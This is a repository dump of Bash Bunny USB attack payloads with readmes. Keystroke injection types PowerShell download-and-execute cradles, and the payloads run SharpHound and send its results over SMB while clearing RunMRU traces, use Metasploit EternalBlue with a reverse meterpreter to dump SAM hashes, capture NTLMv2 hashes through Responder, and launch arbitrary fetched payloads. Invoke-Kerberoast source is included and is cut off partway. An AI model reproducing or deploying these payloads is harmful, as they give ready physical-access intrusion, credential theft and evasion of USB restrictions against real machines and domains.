├── Bunnyhound ├── SharpHound.ps1 ├── payload.txt ├── readme.md └── s.ps1 ├── Eternal_SAM_dump ├── dump.rc ├── payload.txt ├── post.rc └── readme.md ├── Metasploit_Installer ├── msfdb.sh ├── payload.txt └── readme.md ├── Nmap_Installer ├── payload.txt └── readme.md ├── PS_Launcher ├── payload.txt ├── powershell_exec.txt └── readme.md ├── Quickdraw ├── payload.txt └── readme.md ├── README.md └── Roaster ├── invoke-kerberoast.ps1 ├── payload.txt ├── readme.md └── s.ps1 /Bunnyhound/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: Bunnyhound 4 | # Author: golem445 5 | # Version: 1.0 6 | # Dependencies: Impacket, gohttp 7 | # Runtime: Dependent on domain size 8 | # 9 | # 10 | # Sets up Ethernet and HID keyboard interfaces simultaneously, 11 | # then uses HID to import Sharphound into memory via local 12 | # web server and execute the attack. Results are exported 13 | # to the loot directory via SMB. 14 | 15 | # Start Setup 16 | LED SETUP 17 | 18 | # Check dependencies 19 | REQUIRETOOL impacket gohttp 20 | GET SWITCH_POSITION 21 | 22 | # Temporary loot directory 23 | mkdir -p /loot/smb/ 24 | 25 | # Permanent loot directory 26 | mkdir -p /root/udisk/loot/bunnyhound_exfil/ 27 | 28 | # Set interfaces 29 | ATTACKMODE RNDIS_ETHERNET HID 30 | 31 | # Start web server 32 | cd /root/udisk/payloads/$SWITCH_POSITION 33 | gohttp -p 80 & 34 | 35 | # Start SMB Server 36 | python /tools/impacket/examples/smbserver.py s /loot/smb & 37 | 38 | # Start attack 39 | LED ATTACK 40 | RUN WIN powershell 41 | Q STRING "IEX (New-Object Net.Webclient).DownloadString('http://172.16.64.1/s.ps1')" 42 | Q ENTER 43 | 44 | # Wait until files are done copying. 45 | LED STAGE2 46 | while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done 47 | 48 | # Start Cleanup 49 | LED CLEANUP 50 | 51 | # Delete Exfil file 52 | rm /loot/smb/EXFILTRATION_COMPLETE 53 | 54 | # Move Kerberos SPNS to permanent loot directory 55 | mv /loot/smb/* /root/udisk/loot/bunnyhound_exfil/ 56 | 57 | # Clean up temporary loot directory 58 | rm -rf /loot/smb/* 59 | 60 | # Sync file system 61 | sync 62 | 63 | # Complete 64 | LED FINISH -------------------------------------------------------------------------------- /Bunnyhound/readme.md: -------------------------------------------------------------------------------- 1 | # Bunnyhound 2 | * Author: golem445 3 | * Version: 1.0 4 | * Target: Windows Domains 5 | 6 | ## Description 7 | 8 | Sets up Ethernet and HID keyboard interfaces simultaneously, 9 | then uses HID to import Sharphound into memory via Bash Bunny 10 | web server and execute the attack. Results are exported to 11 | the loot directory via SMB. 12 | 13 | Note: This module will bypass network restrictions on USB 14 | disk drives as only a network card and keyboard are emulated. 15 | 16 | ## Requirements 17 | 18 | Impacket and gohttp should be installed 19 | 20 | ## STATUS 21 | 22 | | Status | Description | 23 | | ------------------- | ---------------------------------------- | 24 | | Flashing Red | Impacket or gohttp not found | 25 | | Solid Violet | Setup for attack | 26 | | Flashing Amber | Attack in progress | 27 | | Flashing Cyan | Cleaning up | 28 | | Solid Green | Attack complete | 29 | 30 | ## Credits 31 | 32 | * Hak5Darren for SMB exfil -------------------------------------------------------------------------------- /Bunnyhound/s.ps1: -------------------------------------------------------------------------------- 1 | IEX (New-object Net.Webclient).DownloadString('http://172.16.64.1/Sharphound.ps1');Invoke-Bloodhound -NoSaveCache -CompressData 2 | move Blood* \\172.16.64.1\s\ 3 | New-Item -Path \\172.16.64.1\s -ItemType "file" -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE" 4 | Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue 5 | exit -------------------------------------------------------------------------------- /Eternal_SAM_dump/dump.rc: -------------------------------------------------------------------------------- 1 | use exploit/windows/smb/ms17_010_eternalblue 2 | set PAYLOAD windows/x64/meterpreter/reverse_tcp 3 | set RHOST 172.16.64.64 4 | set LHOST 172.16.64.1 5 | set AutoRunScript post.rc 6 | spool /root/sam_dump.txt 7 | exploit -------------------------------------------------------------------------------- /Eternal_SAM_dump/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: Eternal_SAM_Dump 4 | # Author: golem445 5 | # Version: 1.0 6 | # Dependencies: Metasploit, Nmap 7.70+ 7 | # Runtime: 3+ minutes 8 | # Tested OS's: Windows 7, Windows 2008 9 | # 10 | # This module first tests if a host is vulnerable to MS17-010. If 11 | # patched, the LED will turn red. If vulnerable, a blue light will 12 | # flash and the module will dump the SAM regardless if the machine 13 | # is locked. SAM hashes are then exported to the loot directory. 14 | 15 | LED SETUP 16 | ATTACKMODE RNDIS_ETHERNET 17 | GET SWITCH_POSITION 18 | LOOTDIR=/root/udisk/loot/ 19 | HOST=${TARGET_HOSTNAME} 20 | mkdir -p $LOOTDIR 21 | 22 | # Check if host is vulnerable to ms17-010 23 | LED ATTACK 24 | cd /root/ 25 | nmap -v -p445 -Pn -n --script smb-vuln-ms17-010.nse 172.16.64.64 -oX patch.txt 26 | 27 | # If host isn't vulnerable, we clean up and quit. If successful, run the attack 28 | if [ "$(ls -A /root/)" ]; then 29 | if grep "is patched." /root/*.txt; then 30 | rm -rf /root/patch.txt 31 | LED FAIL 32 | else 33 | # Attack 34 | LED C SLOW 35 | rm -rf /root/patch.txt 36 | cd /root/udisk/payloads/$SWITCH_POSITION/ 37 | msfconsole -r dump.rc 38 | 39 | # Cleanup 40 | # If hostname is blank, set to "noname" 41 | [[ -z "$HOST" ]] && HOST="unknown" 42 | COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l) 43 | COUNT=$((COUNT+1)) 44 | mkdir -p $LOOTDIR/$HOST-$COUNT 45 | cat /root/sam_dump.txt | grep ::: > $LOOTDIR/$HOST-$COUNT/sam_dump.txt 46 | rm /root/sam_dump.txt 47 | 48 | # Done 49 | LED FINISH 50 | fi 51 | fi -------------------------------------------------------------------------------- /Eternal_SAM_dump/post.rc: -------------------------------------------------------------------------------- 1 | run post/windows/gather/hashdump -------------------------------------------------------------------------------- /Eternal_SAM_dump/readme.md: -------------------------------------------------------------------------------- 1 | # Eternal_SAM_Dump 2 | * Author: golem445 3 | * Version: 1.0 4 | * Target: Windows 7, Windows 2008 5 | 6 | ## Description 7 | 8 | This module first tests if a host is vulnerable to MS17-010. If patched, the LED will 9 | turn red. If vulnerable, a blue light will flash and the module will dump the SAM 10 | regardless if the machine is locked. SAM hashes are then exported to the loot directory. 11 | 12 | ## Requirements 13 | 14 | Metaspsloit and Nmap 7.70+ should be installed 15 | 16 | ## STATUS 17 | 18 | | Status | Description | 19 | | ------------------- | ---------------------------------------- | 20 | | Solid Violet | Setup for attack | 21 | | Flashing Red | Host is patched against MS17-010 | 22 | | Flashing Cyan | Appears vulnerable, attack in progress | 23 | | Solid Green | Attack complete | 24 | 25 | ## Credits 26 | 27 | * zerosum0x0 for his work on the Eternalblue Metasploit module -------------------------------------------------------------------------------- /Metasploit_Installer/msfdb.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | cat < /opt/pg-utf8.sql 4 | update pg_database set datallowconn = TRUE where datname = 'template0'; 5 | \c template0 6 | update pg_database set datistemplate = FALSE where datname = 'template1'; 7 | drop database template1; 8 | create database template1 with template = template0 encoding = 'UTF8'; 9 | update pg_database set datistemplate = TRUE where datname = 'template1'; 10 | \c template1 11 | update pg_database set datallowconn = FALSE where datname = 'template0'; 12 | \q 13 | EOF 14 | postgres psql -f /opt/pg-utf8.sql && 15 | postgres createuser msfdev -dRS && 16 | postgres psql -c \ 17 | "ALTER USER msfdev with ENCRYPTED PASSWORD 'RedvsBlue';" && 18 | postgres createdb --owner msfdev msf_dev_db && 19 | postgres createdb --owner msfdev msf_test_db && 20 | cat < /opt/database.yml 21 | 22 | # Development Database 23 | development: &pgsql 24 | adapter: postgresql 25 | database: msf_dev_db 26 | username: msfdev 27 | password: RedvsBlue 28 | host: localhost 29 | port: 5432 30 | pool: 5 31 | timeout: 5 32 | 33 | # Production database -- same as dev 34 | production: &production 35 | <<: *pgsql 36 | 37 | # Test database -- not the same, since it gets dropped all the time 38 | test: 39 | <<: *pgsql 40 | database: msf_test_db 41 | EOF 42 | # echo "Manually move /opt/database.yml to $HOME/.msf4/database.yml" 43 | 44 | -------------------------------------------------------------------------------- /Metasploit_Installer/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: Metasploit_Installer 4 | # Author: golem445 5 | # Version: 1.0 6 | # Dependencies: Internet Connection Sharing enabled 7 | # 8 | # Sets up an Ethernet interface, then proceeds 9 | # to install Metasploit on the Bash Bunny using 10 | # a re-engineered Pentesters Framework script 11 | 12 | ## Get setup 13 | LED SETUP 14 | ATTACKMODE RNDIS_ETHERNET 15 | GET SWITCH_POSITION 16 | 17 | # Install dependencies 18 | apt-get update -y 19 | apt-get install -y autoconf bison build-essential curl git-core libapr1 libaprutil1 libcurl4-openssl-dev libgmp3-dev libpcap-dev libpq-dev libreadline6-dev libsqlite3-dev libssl-dev libsvn1 libtool libxml2 libxml2-dev libxslt-dev libyaml-dev locate ncurses-dev openssl postgresql postgresql-contrib wget xsel zlib1g zlib1g-dev 20 | 21 | # Prep for and retrieve Metasploit files 22 | cd /root/ 23 | date -s '20180518' 24 | wget -O - https://apt.metasploit.com/metasploit-framework.gpg.key | apt-key add - 25 | curl -k -A "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30" https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb -o msfinstall 26 | chmod 755 msfinstall 27 | 28 | ## Install Metasploit 29 | LED ATTACK 30 | ./msfinstall 31 | update-rc.d postgresql enable 32 | cp /root/udisk/payloads/$SWITCH_POSITION/msfdb.sh /root/metasploit/ 33 | chmod +x msfdb.sh 34 | sh msfdb.sh 35 | mkdir /root/.msf4 36 | cp /opt/database.yml /root/.msf4/ 37 | 38 | # Cleanup 39 | rm -rf /root/metasploit/ 40 | rm -rf /usr/local/bin/msf* 41 | rm msfinstall 42 | 43 | # Sync the file system 44 | sync 45 | 46 | ## Finished 47 | LED FINISH -------------------------------------------------------------------------------- /Metasploit_Installer/readme.md: -------------------------------------------------------------------------------- 1 | # Metasploit_Installer 2 | * Author: golem445 3 | * Version: 1.0 4 | 5 | ## Description 6 | 7 | Sets up an Ethernet interface, then proceeds to install Metasploit 8 | on the Bash Bunny using a re-engineered Pentesters Framework script 9 | 10 | ## Requirements 11 | 12 | Internet Connection Sharing should be enabled to the Bash Bunny 13 | (See the hak5 wiki at https://wiki.bashbunny.com/#!index.md for 14 | additional guidance) 15 | 16 | ## STATUS 17 | 18 | | Status | Description | 19 | | ------------------- | ---------------------------------------- | 20 | | Solid Violet | Setup for install | 21 | | Flashing Amber | Installing Metasploit | 22 | | Solid Green | Installation complete | 23 | 24 | ## Credits 25 | 26 | * David Kennedy (ReL1K) - For creating the original PTF script 27 | -------------------------------------------------------------------------------- /Nmap_Installer/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: Nmap_Installer 4 | # Author: golem445 5 | # Version: 1.0 6 | # Dependencies: Internet Connection Sharing enabled 7 | # 8 | # Installs the latest Nmap via subversion 9 | 10 | ## Get setup 11 | LED SETUP 12 | ATTACKMODE RNDIS_ETHERNET 13 | 14 | # Install dependencies 15 | apt-get update -y 16 | apt-get install subversion autoconf build-essential libssl-dev 17 | 18 | ## Install Nmap 19 | LED ATTACK 20 | cd /root/ 21 | svn co https://svn.nmap.org/nmap/ 22 | cd nmap 23 | ./configure 24 | make 25 | make install 26 | 27 | # Cleanup 28 | cd /root/ 29 | rm -rf nmap 30 | 31 | # Sync the file system 32 | sync 33 | 34 | ## Finished 35 | LED FINISH -------------------------------------------------------------------------------- /Nmap_Installer/readme.md: -------------------------------------------------------------------------------- 1 | # Nmap_Installer 2 | * Author: golem445 3 | * Version: 1.0 4 | 5 | ## Description 6 | 7 | Sets up Ethernet, then proceeds to install the latest Nmap via subversion 8 | 9 | ## Requirements 10 | 11 | Internet Connection Sharing should be enabled to the Bash Bunny 12 | (See the hak5 wiki at https://wiki.bashbunny.com/#!index.md for 13 | additional guidance) 14 | 15 | ## STATUS 16 | 17 | | Status | Description | 18 | | ------------------- | ---------------------------------------- | 19 | | Solid Violet | Setup for install | 20 | | Flashing Amber | Installing Nmap | 21 | | Solid Green | Installation complete | 22 | -------------------------------------------------------------------------------- /PS_Launcher/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: PS_Launcher 4 | # Author: golem445 5 | # Version: 1.0 6 | # Dependencies: gohttp 7 | # Runtime: ~5 seconds 8 | # 9 | # Sets up Ethernet and HID keyboard interfaces simultaneously, 10 | # then uses HID to execute the configured Powershell command 11 | # via local web server. Insert the Powershell payload to be 12 | # executed into your powershell_exec.txt file. 13 | # 14 | 15 | # Start Setup 16 | LED SETUP 17 | 18 | # Check dependencies 19 | REQUIRETOOL gohttp 20 | GET SWITCH_POSITION 21 | 22 | # Set interfaces 23 | ATTACKMODE RNDIS_ETHERNET HID 24 | 25 | # Start web server 26 | cd /root/udisk/payloads/$SWITCH_POSITION 27 | cat powershell_exec.txt > s.ps1 28 | gohttp -p 80 & 29 | 30 | # Start attack 31 | LED ATTACK 32 | RUN WIN powershell "IEX (New-object Net.Webclient).DownloadString('http://172.16.64.1/s.ps1')" 33 | 34 | # Sync file system 35 | sync 36 | 37 | # Complete 38 | LED FINISH -------------------------------------------------------------------------------- /PS_Launcher/powershell_exec.txt: -------------------------------------------------------------------------------- 1 | Replace text with powershell command -------------------------------------------------------------------------------- /PS_Launcher/readme.md: -------------------------------------------------------------------------------- 1 | # PS_Launcher 2 | * Author: golem445 3 | * Version: 1.0 4 | 5 | ## Description 6 | 7 | Sets up Ethernet and HID keyboard interfaces simultaneously, 8 | then uses HID to execute the configured Powershell command 9 | via local web server. Insert the Powershell payload to be 10 | executed into your powershell_exec.txt file. 11 | 12 | Note: This module will bypass network restrictions on USB 13 | disk drives as only a network card and keyboard are emulated. 14 | 15 | ## Requirements 16 | 17 | gohttp should be installed 18 | 19 | ## STATUS 20 | 21 | | Status | Description | 22 | | ------------------- | ---------------------------------------- | 23 | | Flashing Red | gohttp not found | 24 | | Solid Violet | Setup for attack | 25 | | Flashing Amber | Attack in progress | 26 | | Flashing Cyan | Cleaning up | 27 | | Solid Green | Attack complete | 28 | -------------------------------------------------------------------------------- /Quickdraw/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: Quickdraw 4 | # Author: golem445 5 | # Version: 1.0 6 | # Dependencies: Responder 7 | # Runtime: ~8 seconds 8 | # 9 | # Sets up Ethernet and HID keyboard interfaces simultaneously, 10 | # runs Responder, then uses HID to generate an NTLMv2 hash 11 | # response from the target computer. 12 | 13 | # Prereq check 14 | REQUIRETOOL responder 15 | 16 | # Begin attack setup 17 | LED SETUP 18 | ATTACKMODE RNDIS_ETHERNET HID 19 | GET TARGET_HOSTNAME 20 | LOOTDIR=/root/udisk/loot/quickdraw 21 | 22 | # Prep loot logging 23 | mkdir -p $LOOTDIR 24 | HOST=${TARGET_HOSTNAME} 25 | COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l) 26 | COUNT=$((COUNT+1)) 27 | mkdir -p $LOOTDIR/$HOST-$COUNT 28 | cd /tools/responder/ 29 | rm logs/* 30 | 31 | # Begin Responder 32 | LED ATTACK 33 | python Responder.py -I usb0 -wfvr & 34 | 35 | ## Start HID Attack 36 | sleep 1 37 | RUN WIN cmd 38 | Q DELAY 250 39 | Q STRING "powershell \\\\172.16.64.1\\s" 40 | Q ENTER 41 | Q STRING "exit" 42 | Q ENTER 43 | 44 | # Wait for NTLMv2 capture to complete 45 | LED STAGE2 46 | until [ -f logs/*NTLM* ] 47 | do 48 | sleep 1 49 | done 50 | 51 | # copy logs to loot directory 52 | cp logs/* $LOOTDIR/$HOST-$COUNT 53 | 54 | # Sync the file system 55 | sync 56 | 57 | ## Finished 58 | LED FINISH -------------------------------------------------------------------------------- /Quickdraw/readme.md: -------------------------------------------------------------------------------- 1 | # Quickdraw 2 | * Author: golem445 3 | * Version: 1.0 4 | * Target: Windows Domains 5 | 6 | ## Description 7 | 8 | Sets up Ethernet and HID keyboard interfaces simultaneously, 9 | runs Responder, then uses HID to generate an NTLMv2 hash 10 | response from the target computer. 11 | 12 | Note: This module will bypass network restrictions on USB 13 | disk drives as only a network card and keyboard are emulated. 14 | 15 | ## Requirements 16 | 17 | Responder should be installed 18 | 19 | ## STATUS 20 | 21 | | Status | Description | 22 | | ------------------- | ---------------------------------------- | 23 | | Flashing Red | Responder not found | 24 | | Solid Violet | Setup for attack | 25 | | Flashing Amber | Attack in progress | 26 | | Solid Green | Attack complete | 27 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # bunny_payloads -------------------------------------------------------------------------------- /Roaster/invoke-kerberoast.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | 3 | Invoke-Kerberoast.ps1 4 | Author: Will Schroeder (@harmj0y), @machosec 5 | License: BSD 3-Clause 6 | Required Dependencies: None 7 | 8 | Credit to Tim Medin (@TimMedin) for the Kerberoasting concept and original toolset implementation (https://github.com/nidem/kerberoast). 9 | 10 | Note: the primary method of use will be Invoke-Kerberoast with various targeting options. 11 | 12 | #> 13 | 14 | function Get-DomainSearcher { 15 | <# 16 | .SYNOPSIS 17 | 18 | Helper used by various functions that builds a custom AD searcher object. 19 | 20 | Author: Will Schroeder (@harmj0y) 21 | License: BSD 3-Clause 22 | Required Dependencies: Get-NetDomain 23 | 24 | .DESCRIPTION 25 | 26 | Takes a given domain and a number of customizations and returns a 27 | System.DirectoryServices.DirectorySearcher object. This function is used 28 | heavily by other LDAP/ADSI search function. 29 | 30 | .PARAMETER Domain 31 | 32 | Specifies the domain to use for the query, defaults to the current domain. 33 | 34 | .PARAMETER LDAPFilter 35 | 36 | Specifies an LDAP query string that is used to filter Active Directory objects. 37 | 38 | .PARAMETER Properties 39 | 40 | Specifies the properties of the output object to retrieve from the server. 41 | 42 | .PARAMETER SearchBase 43 | 44 | The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" 45 | Useful for OU queries. 46 | 47 | .PARAMETER SearchBasePrefix 48 | 49 | Specifies a prefix for the LDAP search string (i.e. "CN=Sites,CN=Configuration"). 50 | 51 | .PARAMETER Server 52 | 53 | Specifies an Active Directory server (domain controller) to bind to for the search. 54 | 55 | .PARAMETER SearchScope 56 | 57 | Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). 58 | 59 | .PARAMETER ResultPageSize 60 | 61 | Specifies the PageSize to set for the LDAP searcher object. 62 | 63 | .PARAMETER SecurityMasks 64 | 65 | Specifies an option for examining security information of a directory object. 66 | One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. 67 | 68 | .PARAMETER Tombstone 69 | 70 | Switch. Specifies that the searcher should also return deleted/tombstoned objects. 71 | 72 | .PARAMETER Credential 73 | 74 | A [Management.Automation.PSCredential] object of alternate credentials 75 | for connection to the target domain. 76 | 77 | .EXAMPLE 78 | 79 | Get-DomainSearcher -Domain testlab.local 80 | 81 | Return a searcher for all objects in testlab.local. 82 | 83 | .EXAMPLE 84 | 85 | Get-DomainSearcher -Domain testlab.local -LDAPFilter '(samAccountType=805306368)' -Properties 'SamAccountName,lastlogon' 86 | 87 | Return a searcher for user objects in testlab.local and only return the SamAccountName and LastLogon properties. 88 | 89 | .EXAMPLE 90 | 91 | Get-DomainSearcher -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" 92 | 93 | Return a searcher that searches through the specific ADS/LDAP search base (i.e. OU). 94 | 95 | .OUTPUTS 96 | 97 | System.DirectoryServices.DirectorySearcher 98 | #> 99 | 100 | [OutputType('System.DirectoryServices.DirectorySearcher')] 101 | [CmdletBinding()] 102 | Param( 103 | [Parameter(ValueFromPipeline = $True)] 104 | [ValidateNotNullOrEmpty()] 105 | [String] 106 | $Domain, 107 | 108 | [ValidateNotNullOrEmpty()] 109 | [Alias('Filter')] 110 | [String] 111 | $LDAPFilter, 112 | 113 | [ValidateNotNullOrEmpty()] 114 | [String[]] 115 | $Properties, 116 | 117 | [ValidateNotNullOrEmpty()] 118 | [String] 119 | $SearchBase, 120 | 121 | [ValidateNotNullOrEmpty()] 122 | [String] 123 | $SearchBasePrefix, 124 | 125 | [ValidateNotNullOrEmpty()] 126 | [String] 127 | $Server, 128 | 129 | [ValidateSet('Base', 'OneLevel', 'Subtree')] 130 | [String] 131 | $SearchScope = 'Subtree', 132 | 133 | [ValidateRange(1,10000)] 134 | [Int] 135 | $ResultPageSize = 200, 136 | 137 | [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] 138 | [String] 139 | $SecurityMasks, 140 | 141 | [Switch] 142 | $Tombstone, 143 | 144 | [Management.Automation.PSCredential] 145 | [Management.Automation.CredentialAttribute()] 146 | $Credential = [Management.Automation.PSCredential]::Empty 147 | ) 148 | 149 | PROCESS { 150 | 151 | if ($Domain) { 152 | $TargetDomain = $Domain 153 | } 154 | else { 155 | $TargetDomain = (Get-NetDomain).name 156 | } 157 | 158 | if ($Credential -eq [Management.Automation.PSCredential]::Empty) { 159 | if (-not $Server) { 160 | try { 161 | # if there's no -Server specified, try to pull the primary DC to bind to 162 | $BindServer = ((Get-NetDomain).PdcRoleOwner).Name 163 | } 164 | catch { 165 | throw 'Get-DomainSearcher: Error in retrieving PDC for current domain' 166 | } 167 | } 168 | } 169 | elseif (-not $Server) { 170 | try { 171 | $BindServer = ((Get-NetDomain -Credential $Credential).PdcRoleOwner).Name 172 | } 173 | catch { 174 | throw 'Get-DomainSearcher: Error in retrieving PDC for current domain' 175 | } 176 | } 177 | 178 | $SearchString = 'LDAP://' 179 | 180 | if ($BindServer) { 181 | $SearchString += $BindServer 182 | if ($TargetDomain) { 183 | $SearchString += '/' 184 | } 185 | } 186 | 187 | if ($SearchBasePrefix) { 188 | $SearchString += $SearchBasePrefix + ',' 189 | } 190 | 191 | if ($SearchBase) { 192 | if ($SearchBase -Match '^GC://') { 193 | # if we're searching the global catalog, get the path in the right format 194 | $DN = $SearchBase.ToUpper().Trim('/') 195 | $SearchString = '' 196 | } 197 | else { 198 | if ($SearchBase -match '^LDAP://') { 199 | if ($SearchBase -match "LDAP://.+/.+") { 200 | $SearchString = '' 201 | } 202 | else { 203 | $DN = $SearchBase.Substring(7) 204 | } 205 | } 206 | else { 207 | $DN = $SearchBase 208 | } 209 | } 210 | } 211 | else { 212 | if ($TargetDomain -and ($TargetDomain.Trim() -ne '')) { 213 | $DN = "DC=$($TargetDomain.Replace('.', ',DC='))" 214 | } 215 | } 216 | 217 | $SearchString += $DN 218 | Write-Verbose "Get-DomainSearcher search string: $SearchString" 219 | 220 | if ($Credential -ne [Management.Automation.PSCredential]::Empty) { 221 | Write-Verbose "Using alternate credentials for LDAP connection" 222 | $DomainObject = New-Object DirectoryServices.DirectoryEntry($SearchString, $Credential.UserName, $Credential.GetNetworkCredential().Password) 223 | $Searcher = New-Object System.DirectoryServices.DirectorySearcher($DomainObject) 224 | } 225 | else { 226 | $Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString) 227 | } 228 | 229 | $Searcher.PageSize = $ResultPageSize 230 | $Searcher.SearchScope = $SearchScope 231 | $Searcher.CacheResults = $False 232 | 233 | if ($Tombstone) { 234 | $Searcher.Tombstone = $True 235 | } 236 | 237 | if ($LDAPFilter) { 238 | $Searcher.filter = $LDAPFilter 239 | } 240 | 241 | if ($SecurityMasks) { 242 | $Searcher.SecurityMasks = Switch ($SecurityMasks) { 243 | 'Dacl' { [System.DirectoryServices.SecurityMasks]::Dacl } 244 | 'Group' { [System.DirectoryServices.SecurityMasks]::Group } 245 | 'None' { [System.DirectoryServices.SecurityMasks]::None } 246 | 'Owner' { [System.DirectoryServices.SecurityMasks]::Owner } 247 | 'Sacl' { [System.DirectoryServices.SecurityMasks]::Sacl } 248 | } 249 | } 250 | 251 | if ($Properties) { 252 | # handle an array of properties to load w/ the possibility of comma-separated strings 253 | $PropertiesToLoad = $Properties| ForEach-Object { $_.Split(',') } 254 | $Searcher.PropertiesToLoad.AddRange(($PropertiesToLoad)) 255 | } 256 | 257 | $Searcher 258 | } 259 | } 260 | 261 | 262 | function Convert-LDAPProperty { 263 | <# 264 | .SYNOPSIS 265 | 266 | Helper that converts specific LDAP property result fields and outputs 267 | a custom psobject. 268 | 269 | Author: Will Schroeder (@harmj0y) 270 | License: BSD 3-Clause 271 | Required Dependencies: None 272 | 273 | .DESCRIPTION 274 | 275 | Converts a set of raw LDAP properties results from ADSI/LDAP searches 276 | into a proper PSObject. Used by several of the Get-Net* function. 277 | 278 | .PARAMETER Properties 279 | 280 | Properties object to extract out LDAP fields for display. 281 | 282 | .OUTPUTS 283 | 284 | System.Management.Automation.PSCustomObject 285 | 286 | A custom PSObject with LDAP hashtable properties translated. 287 | #> 288 | 289 | [OutputType('System.Management.Automation.PSCustomObject')] 290 | [CmdletBinding()] 291 | Param( 292 | [Parameter(Mandatory = $True, ValueFromPipeline = $True)] 293 | [ValidateNotNullOrEmpty()] 294 | $Properties 295 | ) 296 | 297 | $ObjectProperties = @{} 298 | 299 | $Properties.PropertyNames | ForEach-Object { 300 | if (($_ -eq 'objectsid') -or ($_ -eq 'sidhistory')) { 301 | # convert the SID to a string 302 | $ObjectProperties[$_] = (New-Object System.Security.Principal.SecurityIdentifier($Properties[$_][0], 0)).Value 303 | } 304 | elseif ($_ -eq 'objectguid') { 305 | # convert the GUID to a string 306 | $ObjectProperties[$_] = (New-Object Guid (,$Properties[$_][0])).Guid 307 | } 308 | elseif ($_ -eq 'ntsecuritydescriptor') { 309 | $ObjectProperties[$_] = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Properties[$_][0], 0 310 | } 311 | elseif ( ($_ -eq 'lastlogon') -or ($_ -eq 'lastlogontimestamp') -or ($_ -eq 'pwdlastset') -or ($_ -eq 'lastlogoff') -or ($_ -eq 'badPasswordTime') ) { 312 | # convert timestamps 313 | if ($Properties[$_][0] -is [System.MarshalByRefObject]) { 314 | # if we have a System.__ComObject 315 | $Temp = $Properties[$_][0] 316 | [Int32]$High = $Temp.GetType().InvokeMember('HighPart', [System.Reflection.BindingFlags]::GetProperty, $null, $Temp, $null) 317 | [Int32]$Low = $Temp.GetType().InvokeMember('LowPart', [System.Reflection.BindingFlags]::GetProperty, $null, $Temp, $null) 318 | $ObjectProperties[$_] = ([datetime]::FromFileTime([Int64]("0x{0:x8}{1:x8}" -f $High, $Low))) 319 | } 320 | else { 321 | # otherwise just a string 322 | $ObjectProperties[$_] = ([datetime]::FromFileTime(($Properties[$_][0]))) 323 | } 324 | } 325 | elseif ($Properties[$_][0] -is [System.MarshalByRefObject]) { 326 | # try to convert misc com objects 327 | $Prop = $Properties[$_] 328 | try { 329 | $Temp = $Prop[$_][0] 330 | Write-Verbose $_ 331 | [Int32]$High = $Temp.GetType().InvokeMember('HighPart', [System.Reflection.BindingFlags]::GetProperty, $null, $Temp, $null) 332 | [Int32]$Low = $Temp.GetType().InvokeMember('LowPart', [System.Reflection.BindingFlags]::GetProperty, $null, $Temp, $null) 333 | $ObjectProperties[$_] = [Int64]("0x{0:x8}{1:x8}" -f $High, $Low) 334 | } 335 | catch { 336 | $ObjectProperties[$_] = $Prop[$_] 337 | } 338 | } 339 | elseif ($Properties[$_].count -eq 1) { 340 | $ObjectProperties[$_] = $Properties[$_][0] 341 | } 342 | else { 343 | $ObjectProperties[$_] = $Properties[$_] 344 | } 345 | } 346 | 347 | New-Object -TypeName PSObject -Property $ObjectProperties 348 | } 349 | 350 | 351 | function Get-NetDomain { 352 | <# 353 | .SYNOPSIS 354 | 355 | Returns a given domain object. 356 | 357 | Author: Will Schroeder (@harmj0y) 358 | License: BSD 3-Clause 359 | Required Dependencies: None 360 | 361 | .DESCRIPTION 362 | 363 | Returns a System.DirectoryServices.ActiveDirectory.Domain object for the current 364 | domain or the domain specified with -Domain X. 365 | 366 | .PARAMETER Domain 367 | 368 | Specifies the domain name to query for, defaults to the current domain. 369 | 370 | .PARAMETER Credential 371 | 372 | A [Management.Automation.PSCredential] object of alternate credentials 373 | for connection to the target domain. 374 | 375 | .EXAMPLE 376 | 377 | Get-NetDomain -Domain testlab.local 378 | 379 | .OUTPUTS 380 | 381 | System.DirectoryServices.ActiveDirectory.Domain 382 | 383 | .LINK 384 | 385 | http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG 386 | #> 387 | 388 | [OutputType('System.DirectoryServices.ActiveDirectory.Domain')] 389 | [CmdletBinding()] 390 | Param( 391 | [Parameter(Position = 0, ValueFromPipeline = $True)] 392 | [ValidateNotNullOrEmpty()] 393 | [String] 394 | $Domain, 395 | 396 | [Management.Automation.PSCredential] 397 | [Management.Automation.CredentialAttribute()] 398 | $Credential = [Management.Automation.PSCredential]::Empty 399 | ) 400 | 401 | PROCESS { 402 | if ($Credential -ne [Management.Automation.PSCredential]::Empty) { 403 | 404 | Write-Verbose "Using alternate credentials for Get-NetDomain" 405 | 406 | if (-not $Domain) { 407 | # if no domain is supplied, extract the logon domain from the PSCredential passed 408 | $TargetDomain = $Credential.GetNetworkCredential().Domain 